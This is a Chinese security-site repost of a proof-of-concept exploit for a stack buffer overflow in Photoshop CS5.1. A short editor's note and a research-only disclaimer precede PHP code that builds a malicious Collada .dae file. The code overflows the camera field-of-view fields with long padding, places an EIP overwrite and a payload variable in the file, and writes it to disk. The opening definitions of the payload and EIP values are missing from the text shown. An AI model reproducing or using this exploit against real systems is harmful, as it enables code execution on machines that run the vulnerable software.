小编注:Adobe公司旗下的Photoshop CS5.1近日被发现基于堆栈的缓冲区溢出漏洞。目前最新版本为photoshop cs6,于2012年4月24日发布。在最新版本未发现该漏洞。但是现在用cs5.1的还是非常多。
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
测试方法:
'.
''.
' '.
' '.
' rgod'.
' Maya 8.0 | ColladaMaya v3.02 | FCollada v3.2'.
' Collada Maya Export Options: bakeTransforms=0;exportPolygonMeshes=1;bakeLighting=0;isSampling=0;'.
' curveConstrainSampling=0;exportCameraAsLookat=0;'.
' exportLights=1;exportCameras=1;exportJointsAndSkin=1;'.
' exportAnimations=1;exportTriangles=1;exportInvisibleNodes=0;'.
' exportNormals=1;exportTexCoords=1;exportVertexColors=1;exportTangents=0;'.
' exportTexTangents=0;exportConstraints=1;exportPhysics=0;exportXRefs=1;'.
' dereferenceXRefs=0;cameraXFov=0;'.
str_repeat("A",170).
'cameraYFov=1;'.
str_repeat("a",100).
str_repeat("b",100).
str_repeat("c",100).
str_repeat("d",100).
str_repeat("e",100).
str_repeat("f",100).
str_repeat("g",100).
str_repeat("h",100).
str_repeat("i",100).
str_repeat("j",100).
str_repeat("k",100).
str_repeat("l",100).
str_repeat("m",100).
str_repeat("n",100).
"aaaabbbA".
$eip.
"ccddddeeeeffffgggghhhhiiiijjjjkkkkllllmmmmnnnnooooppppqqqqrrrrssssttttuuuuvvvvwwwwxxxxyyyy".
' '.
''.
$payload.
''.
' '.
' Copyright 2012 rgod Computer Entertainment Inc.'.
' '.
' file:///C:/vs2005/sample_data/untitled'.
' '.
' 2008-04-24T22:29:59Z'.
' 2099-02-21T22:52:44Z'.
' '.
' Y_UP'.
' '.
'';
file_put_contents("photoshop_sample.dae",$_xml);
echo "done";
?>
via:sebug.net